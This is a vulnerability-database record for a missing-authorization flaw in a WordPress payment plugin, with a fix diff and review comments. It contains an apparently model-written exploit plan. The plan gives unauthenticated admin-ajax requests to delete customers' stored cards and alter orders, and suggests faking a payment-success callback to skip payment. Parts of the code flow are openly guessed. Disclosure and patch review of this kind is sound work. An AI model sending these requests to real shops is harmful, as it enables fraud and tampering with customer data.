[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fevO47xj1diAozQCgj-lYO20okHEsMucYRD2xS4f9_TU":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":27,"research_verified":28,"research_rounds_completed":29,"research_plan":30,"research_summary":31,"research_vulnerable_code":32,"research_fix_diff":33,"research_exploit_outline":34,"research_model_used":35,"research_started_at":36,"research_completed_at":37,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":28,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":28,"source_links":38},"CVE-2025-67942","peach-payments-gateway-missing-authorization","Peach Payments Gateway \u003C= 3.3.6 - Missing Authorization","The Peach Payments Gateway plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 3.3.6. This makes it possible for unauthenticated attackers to perform an unauthorized action.","wc-peach-payments-gateway",null,"\u003C=3.3.6","3.3.7","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-01-16 00:00:00","2026-01-19 20:23:01",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F681e91a8-af2b-4b54-80a8-5886d681fc94?source=api-prod",4,[22,23,24,25,26],"README.txt","assets\u002Fjs\u002Ffront-peach.js","changelog.txt","readme.md","woocommerce-gateway-peach-payments.php","researched",false,3,"# Exploitation Research Plan - CVE-2025-67942\n\n## 1. 
Vulnerability Summary\nThe **Peach Payments Gateway** plugin for WordPress (versions \u003C= 3.3.6) contains a **Missing Authorization** vulnerability. Several AJAX handlers registered via `wp_ajax_nopriv_` (for unauthenticated users) and `wp_ajax_` (for authenticated users) fail to perform capability checks (`current_user_can`) or verify ownership of the resources being modified. This allows unauthenticated attackers to perform unauthorized actions such as deleting payment cards or modifying order payment details.\n\n## 2. Attack Vector Analysis\n- **Endpoints**: WordPress AJAX endpoint `\u002Fwp-admin\u002Fadmin-ajax.php`.\n- **Actions**: \n    1. `peachCardUpdate`: Intended to remove a stored payment card.\n    2. `peachCardUpdateOrder`: Intended to update an order with a specific payment card.\n    3. `peachEmbedUpdateOrder`: Intended to update order status after a successful embedded checkout.\n- **Payload Parameters**:\n    - `action`: `peachCardUpdate`, `peachCardUpdateOrder`, or `peachEmbedUpdateOrder`.\n    - `card`: (For `peachCardUpdate`) The ID of the payment token to delete.\n    - `cardID`: (For `peachCardUpdateOrder`) The ID of the card to associate with the order.\n    - `orderID`: (For `peachCardUpdateOrder`) The WooCommerce order ID to modify.\n    - `mystatus`, `transaction`, `mycode`: (For `peachEmbedUpdateOrder`) Status and transaction identifiers.\n- **Authentication**: Unauthenticated (via `wp_ajax_nopriv_` hooks).\n- **Preconditions**: The plugin must be active. For `peachCardUpdate`, a payment card (token) ID must be known or enumerated.\n\n## 3. Code Flow\nThe vulnerability originates from the lack of security checks in the AJAX callback functions.\n\n1. 
**Registration**: The plugin registers AJAX actions in its initialization (likely in `WC_Peach_Payments::__construct` or an `init` hook, often within `classes\u002FpluginSupport.php` or `classes\u002FembeddedCheckout.php`).\n   ```php\n   \u002F\u002F Inferred registration pattern\n   add_action( 'wp_ajax_peachCardUpdate', 'peach_card_update_callback' );\n   add_action( 'wp_ajax_nopriv_peachCardUpdate', 'peach_card_update_callback' );\n   ```\n2. **Trigger**: An HTTP POST request is sent to `admin-ajax.php` with `action=peachCardUpdate`.\n3. **Execution**: The handler function (e.g., `peach_card_update_callback`) is executed.\n4. **Sink**: The handler likely calls `WC_Payment_Token::delete()` or updates `wp_postmeta` (for orders) without:\n   - Verifying the user is logged in.\n   - Verifying the user has the `manage_woocommerce` capability.\n   - Verifying that the `cardID` or `orderID` belongs to the requesting user.\n   - Checking a WordPress nonce.\n\n## 4. Nonce Acquisition Strategy\nBased on `assets\u002Fjs\u002Ffront-peach.js`, the plugin **does not use nonces** for these specific AJAX actions. \n\n- The `jQuery.ajax` calls for `peachCardUpdateOrder` (line 33), `peachCardUpdate` (line 59), and `peachEmbedUpdateOrder` (line 102) only pass the `action` and data parameters.\n- If the researcher needs to verify if a nonce is localized but unused, they can check the `peach_ajax_object` (localized variable name found on JS line 34):\n  1. Navigate to the checkout page: `browser_navigate(\"\u002Fcheckout\u002F\")`\n  2. Evaluate the object: `browser_eval(\"window.peach_ajax_object\")`\n\n**Observation**: Since the JS itself does not include nonces in the requests, the server-side handlers likely do not check them, or if they do, they are bypassable.\n\n## 5. Exploitation Strategy\n\n### Task A: Unauthorized Card Deletion (`peachCardUpdate`)\n1. **Target**: Delete a payment token belonging to a user.\n2. 
**Payload**:\n   - `action`: `peachCardUpdate`\n   - `card`: `[TARGET_CARD_ID]`\n3. **Request**:\n   ```http\n   POST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\n   Content-Type: application\u002Fx-www-form-urlencoded\n\n   action=peachCardUpdate&card=1\n   ```\n\n### Task B: Unauthorized Order Modification (`peachCardUpdateOrder`)\n1. **Target**: Change the payment card associated with an arbitrary order.\n2. **Payload**:\n   - `action`: `peachCardUpdateOrder`\n   - `cardID`: `[NEW_CARD_ID]`\n   - `orderID`: `[TARGET_ORDER_ID]`\n3. **Request**:\n   ```http\n   POST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\n   Content-Type: application\u002Fx-www-form-urlencoded\n\n   action=peachCardUpdateOrder&cardID=2&orderID=101\n   ```\n\n## 6. Test Data Setup\n1. **Plugins**: Install WooCommerce and Peach Payments Gateway (3.3.6).\n2. **WooCommerce Configuration**: Enable the Peach Payments gateway in `WooCommerce > Settings > Payments`.\n3. **User\u002FData Creation**:\n   - Create a Customer user.\n   - Use WP-CLI to create a payment token for that user:\n     `wp eval 'WC_Payment_Tokens::add(new WC_Payment_Token_CC([\"card_type\"=>\"visa\", \"last4\"=>\"1234\", \"expiry_month\"=>\"12\", \"expiry_year\"=>\"2026\", \"user_id\"=>1]));'`\n   - Create an order:\n     `wp post create --post_type=shop_order --post_status=wc-pending --post_title=\"Test Order\"`\n   - Note the Token ID and Order ID.\n\n## 7. Expected Results\n- **For `peachCardUpdate`**: The response should be `success` (as per JS line 64). The payment token record in the database should be deleted or marked as deleted.\n- **For `peachCardUpdateOrder`**: The response should be `1` (as per JS line 40). The order's metadata (e.g., `_payment_method_token`) should be updated to the new ID.\n\n## 8. Verification Steps\n1. **Check Tokens**:\n   `wp eval 'print_r(WC_Payment_Tokens::get_customer_tokens(1));'`\n   Confirm the token previously created is now missing.\n2. 
**Check Order Meta**:\n   `wp post meta get [ORDER_ID] _payment_method_token`\n   Confirm the meta value matches the `cardID` sent in the exploit request.\n\n## 9. Alternative Approaches\nIf `peachCardUpdate` requires authentication (despite the `nopriv` claim), focus on `peachEmbedUpdateOrder`:\n- **Payload**: `action=peachEmbedUpdateOrder&mystatus=SUC&transaction=TEST_TX&mycode=000.000.000`\n- **Objective**: Attempt to force an order status change for the current session's order by mimicking a successful callback from the Peach widget. This bypasses the actual payment requirement.","The Peach Payments Gateway plugin for WordPress fails to implement capability checks or nonce verification on several AJAX handlers, including peachCardUpdate, peachCardUpdateOrder, and peachEmbedUpdateOrder. This allows unauthenticated attackers to perform unauthorized actions such as deleting stored payment tokens, modifying the payment card associated with a WooCommerce order, or altering order statuses.","\u002F\u002F assets\u002Fjs\u002Ffront-peach.js line 33\r\n\t\tjQuery.ajax({\r\n\t\t\turl:peach_ajax_object.ajax_url,\r\n\t\t\tdata:{ \r\n\t\t\t  action: 'peachCardUpdateOrder',\r\n\t\t\t  cardID: card_id,\r\n\t\t\t  orderID: order_id\r\n\t\t\t},\r\n\r\n---\r\n\r\n\u002F\u002F assets\u002Fjs\u002Ffront-peach.js line 59\r\n\t\tjQuery.ajax({\r\n\t\t\turl:peach_ajax_object.ajax_url,\r\n\t\t\tdata:{ \r\n\t\t\t  action: 'peachCardUpdate',\r\n\t\t\t  card: cardID\r\n\t\t\t},\r\n\r\n---\r\n\r\n\u002F\u002F assets\u002Fjs\u002Ffront-peach.js line 102\r\nfunction process_embed(status, transactionid, code){\r\n\tjQuery.ajax({\r\n\t\turl:peach_ajax_object.ajax_url,\r\n\t\tdata:{ \r\n\t\t  action: 'peachEmbedUpdateOrder',\r\n\t\t  mystatus: status,\r\n\t\t  transaction: transactionid,\r\n\t\t  mycode: code\r\n\t\t},","Only in \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwc-peach-payments-gateway\u002F3.3.7\u002Fassets\u002Fimages: MAUCAS.png\ndiff -ru 
\u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwc-peach-payments-gateway\u002F3.3.6\u002Fassets\u002Fjs\u002Ffront-peach.js \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwc-peach-payments-gateway\u002F3.3.7\u002Fassets\u002Fjs\u002Ffront-peach.js\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwc-peach-payments-gateway\u002F3.3.6\u002Fassets\u002Fjs\u002Ffront-peach.js\t2025-05-22 05:51:44.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwc-peach-payments-gateway\u002F3.3.7\u002Fassets\u002Fjs\u002Ffront-peach.js\t2025-11-19 10:35:26.000000000 +0000\n@@ -30,7 +30,8 @@\n \t\t\tdata:{ \n \t\t\t  action: 'peachCardUpdateOrder',\n \t\t\t  cardID: card_id,\n-\t\t\t  orderID: order_id\n+\t\t\t  orderID: order_id,\n+\t\t\t  ajax_nonce: peach_ajax_object.ajax_nonce\n \t\t\t},\n \t\t\tsuccess:function(data){\n \t\t\t\tif(data === '1'){\n@@ -111,7 +112,8 @@\n \t\t  action: 'peachEmbedUpdateOrder',\n \t\t  mystatus: status,\n \t\t  transaction: transactionid,\n-\t\t  mycode: code\n+\t\t  mycode: code,\n+\t\t  ajax_nonce: peach_ajax_object.ajax_nonce\n \t\t},\n \t\tsuccess:function(data){\n \t\t\treturn data;","The exploit targets the WordPress AJAX endpoint \u002Fwp-admin\u002Fadmin-ajax.php using the vulnerable actions registered by the plugin. An unauthenticated attacker can send a POST request with the 'action' parameter set to 'peachCardUpdate' to delete a payment card by providing the 'card' ID. Alternatively, an attacker can use the 'peachCardUpdateOrder' action with 'cardID' and 'orderID' parameters to reassign payment tokens to arbitrary WooCommerce orders. 
Because the plugin uses wp_ajax_nopriv_ hooks for these functions without checking for user capabilities or requiring a valid WordPress nonce, no authentication or specific user session is required to perform these operations.","gemini-3-flash-preview","2026-05-05 07:54:45","2026-05-05 07:55:41",{"type":39,"vulnerable_version":40,"fixed_version":11,"vulnerable_browse":41,"vulnerable_zip":42,"fixed_browse":43,"fixed_zip":44,"all_tags":45},"plugin","3.3.6","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwc-peach-payments-gateway\u002Ftags\u002F3.3.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwc-peach-payments-gateway.3.3.6.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwc-peach-payments-gateway\u002Ftags\u002F3.3.7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwc-peach-payments-gateway.3.3.7.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwc-peach-payments-gateway\u002Ftags"]
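Review bot: in the first hunk of front-peach.js (`@@ -30,7 +30,8 @@`), the added `ajax_nonce: peach_ajax_object.ajax_nonce` only protects the `peachCardUpdateOrder` request if the PHP handler verifies it (for example with `check_ajax_referer`), and that server-side change is not in this diff. A nonce is an anti-CSRF token, not an authorization check, so the handler should also confirm that `orderID` and `cardID` belong to the current user before it updates the order. No hunk shown here touches the `peachCardUpdate` call, which this record also lists as affected, so that request still goes out without a nonce.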
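Review bot: in the second hunk of front-peach.js (`@@ -111,7 +112,8 @@`), `mystatus`, `transaction` and `mycode` are still supplied by the browser, so adding `ajax_nonce` does not make the reported payment result trustworthy. The `peachEmbedUpdateOrder` handler should confirm the transaction outcome server-side with the gateway before it changes the order status, and should verify the nonce in PHP. Neither change is visible in this diff.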